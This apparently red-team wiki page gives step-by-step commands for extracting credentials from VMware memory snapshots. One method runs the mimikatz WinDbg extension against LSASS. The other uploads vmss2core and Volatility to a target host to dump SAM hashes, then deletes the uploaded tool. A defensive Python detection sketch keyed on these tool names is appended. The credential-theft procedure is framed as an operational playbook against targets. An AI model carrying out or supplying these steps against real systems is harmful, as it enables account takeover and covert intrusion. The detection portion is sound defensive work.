## LSASS VMware WinDbg Memory/Snapshot Images

SCENARIO: You are able to retrieve a VMware .vmem file from the target and would like to dump the in-memory hashes and credentials.

STEP 1: Install the WinDbg debugging tool and bin2dmp.exe:

https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/index
https://github.com/arizvisa/windows-binary-tools

STEP 2: Download the mimikatz release:

https://github.com/gentilkiwi/mimikatz/releases

STEP 3: Convert your ".vmem" file into a dump file:

```
bin2dmp.exe "SVR2012r2-l.vmem" vmware.dmp
```

STEP 4: Start WinDbg and use "File -> Open Crash Dump" to open your "vmware.dmp" file.

STEP 5: Load the mimikatz WinDbg extension 'mimilib.dll' that matches the bitness (x86/x64) of the dump:

```
kd> .load mimilib.dll
```

STEP 6: Find the lsass process in the memory dump:

```
kd> !process 0 0 lsass.exe
```

STEP 7: Switch the debugger context to that process using the address shown (example: PROCESS fffffa800e0b3b30):

```
kd> .process /r /p fffffa800e0b3b30
```

STEP 8: Run the mimikatz extension command in that process context to dump in-memory hashes and credentials:

```
kd> !mimikatz
```

## Remotely Hashdump VMware Volatility Memory/Snapshot Images

SCENARIO: You are unable to pull down the 1GB+ target VM files due to bandwidth restrictions. Your other option is to load the tools you need onto the target machine where the VM files are stored and extract the hashes there.

STEP 1: Install and review the following:

VMware Snapshot and Saved State Analysis
http://volatility-labs.blogspot.be/2013/05/movp-ii-13-vmware-snapshot-andsaved.html

Volatility Memory Forensics Tool
https://www.volatilityfoundation.org/releases

Vmss2core - VMWare Labs
https://labs.vmware.com/flings/vmss2core

STEP 2: Upload vmss2core.exe to your target and execute the following to dump a VM that is in a "suspended state". Once the dump is created, delete vmss2core.exe. Be sure to note the architecture displayed (example: Win7SP1x86) because you will need it in STEP 3.

!!Caveats!!
For a VM in a suspended state you need both the .vmss and the .vmem files.
For a VM snapshot you need the .vmsn and .vmem files.

```
C:\temp>vmss2core.exe -W /Users/admin/Documents/VMware/Windows_7.vmss /Users/admin/Documents/VMware/Windows_7.vmem
```

STEP 3: Load the standalone Volatility tool onto the target system and execute it against the newly created .dmp file. Note the suggested "Win..." profile (e.g. Win7SP1x86):

```
C:\temp> volatility_2.6_x64.exe imageinfo -f VMmemory.dmp
```

STEP 4: Now you need to get the memory locations of the registry hives we care about, SYSTEM and SAM:

```
C:\temp> volatility_2.6_x64.exe hivelist -f VMmemory.dmp --profile=Win7SP1x86

Example output:
Virtual    Physical   Name
0x86a1c008 0x270ed008 \REGISTRY\MACHINE\SYSTEM
0x87164518 0x241cc518 \SystemRoot\System32\Config\SAM
```

STEP 5: You can now run the Volatility "hashdump" plugin against those hive offsets (the SYSTEM virtual offset as --sys-offset, the SAM virtual offset as --sam-offset) to retrieve the user account hashes:

```
C:\temp> volatility_2.6_x64.exe hashdump -f VMmemory.dmp --profile=Win7SP1x86 --sys-offset=0x86a1c008 --sam-offset=0x87164518
```

[[Home]] #howto
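As an added defender-side example (not part of the original page), here is a small Python detection sketch for the host-side pattern of the second scenario: a .vmem/.vmss/.vmsn file is read on a machine, and shortly afterwards vmss2core, Volatility, bin2dmp, or a WinDbg mimilib.dll load shows up on the same host. The event field names, the 30-minute window and the sample telemetry are constructed assumptions, not a real Sysmon or Security-log schema.

```python
from datetime import datetime, timedelta

# Tool names taken from the page; tune to your own telemetry.
SUSPECT_IMAGES = {"vmss2core.exe", "bin2dmp.exe", "windbg.exe"}
SUSPECT_IMAGE_PREFIX = "volatility"
SUSPECT_DLLS = {"mimilib.dll"}
VM_MEMORY_EXT = (".vmem", ".vmss", ".vmsn")
WINDOW = timedelta(minutes=30)  # assumed correlation window

def _basename(path):
    return path.lower().rsplit("\\", 1)[-1].rsplit("/", 1)[-1]

def _is_tool_event(ev):
    if ev["type"] == "process_create":
        img = _basename(ev["image"])
        return img in SUSPECT_IMAGES or img.startswith(SUSPECT_IMAGE_PREFIX)
    if ev["type"] == "image_load":
        return _basename(ev["loaded"]) in SUSPECT_DLLS
    return False

def detect(events):
    """Return (host, severity, artefact) findings. A suspect tool event alone is
    'medium'; if the same host read a .vmem/.vmss/.vmsn file within WINDOW
    before it, the finding is 'high' (offline credential extraction pattern)."""
    by_host = {}
    for ev in events:
        by_host.setdefault(ev["host"], []).append(ev)
    findings = []
    for host, evs in by_host.items():
        vm_reads = [e["time"] for e in evs if e["type"] == "file_access"
                    and e.get("path", "").lower().endswith(VM_MEMORY_EXT)]
        for e in sorted(evs, key=lambda x: x["time"]):
            if not _is_tool_event(e):
                continue
            correlated = any(timedelta(0) <= e["time"] - t <= WINDOW for t in vm_reads)
            artefact = _basename(e.get("loaded") or e["image"])
            findings.append((host, "high" if correlated else "medium", artefact))
    return findings

# Constructed sample telemetry (not from the page); one host shows the full pattern.
T0 = datetime(2024, 1, 1, 10, 0, 0)
SAMPLE_EVENTS = [
    {"host": "esx-backup01", "time": T0, "type": "file_access", "path": r"D:\VMs\Windows_7.vmem"},
    {"host": "esx-backup01", "time": T0 + timedelta(minutes=2), "type": "process_create", "image": r"C:\temp\vmss2core.exe"},
    {"host": "esx-backup01", "time": T0 + timedelta(minutes=9), "type": "process_create", "image": r"C:\temp\volatility_2.6_x64.exe"},
    {"host": "analyst-ws", "time": T0, "type": "image_load", "image": r"C:\Program Files\WinDbg\windbg.exe", "loaded": r"C:\tools\mimilib.dll"},
    {"host": "analyst-ws", "time": T0, "type": "process_create", "image": r"C:\Windows\System32\notepad.exe"},
]
```

Calling `detect(SAMPLE_EVENTS)` yields two "high" findings for esx-backup01 (vmss2core.exe and volatility_2.6_x64.exe after the .vmem read) and one "medium" finding for the mimilib.dll load on analyst-ws; notepad.exe is ignored.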